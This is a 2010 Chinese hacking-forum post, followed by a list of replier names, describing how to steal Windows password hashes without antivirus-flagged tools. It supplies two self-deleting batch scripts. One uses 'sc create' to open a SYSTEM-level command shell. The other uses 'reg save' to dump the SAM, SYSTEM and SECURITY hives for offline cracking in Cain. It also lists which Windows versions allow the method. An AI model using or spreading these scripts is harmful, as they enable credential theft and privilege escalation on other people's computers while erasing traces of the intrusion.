老外提出的破密码方法

etcat · 发表于 2010-5-29 21:01:11


	看到了一篇文章，提到导出注册表永CAIN来破密码，这对很多抓hash的工具被杀了，自己又不会做免杀的大牛来说，是个福音，其实这个很早以前就有了，貌似是老外提出了的，只是没有引起注意。作者说这个方法不是通杀的： Windows 2000 SP4 (admin) = access denied Windows XP SP2 (admin) = access denied Windows XP SP3 (admin) = access denied Windows 2003 R2 SP2 (admin) = works Windows Vista SP2 (UAC/admin) = works Windows 2008 SP1 (admin) = works Windows 7 (UAC/admin) = works 对用户权限有要求，默认XP SP3是导出不了的，我本地测试了，但是system权限是可以的，那么咱可以创建一个system权限运行的CMD，然后再导出就OK了。其他系统上面没有测试过，大家自己整吧。首先创建一个系统权限执行的CMD： ======================StartSystemCmd.bat========= sc Create systemcmd binPath= "cmd /K start" type= own type= interact sc start systemcmd sc delete systemcmd del %0 =======================END========================= 然后导出文件。 ==================SaveReg.bat======================= @echo off reg save hklm\sam sam.hive reg save hklm\system system.hive reg save hklm\security security.hive del %0 =====================END============================ 然后倒入到CAIN里面破吧。

cddn090805 · 发表于 2010-12-26 20:10:31

ordinary · 发表于 2011-1-1 11:30:19

QQ137558356 · 发表于 2011-1-1 11:52:00

365385825 · 发表于 2011-1-1 12:42:08

wwwlgl · 发表于 2011-1-16 21:41:44

揭东远程人 · 发表于 2011-1-16 22:23:39

相关帖子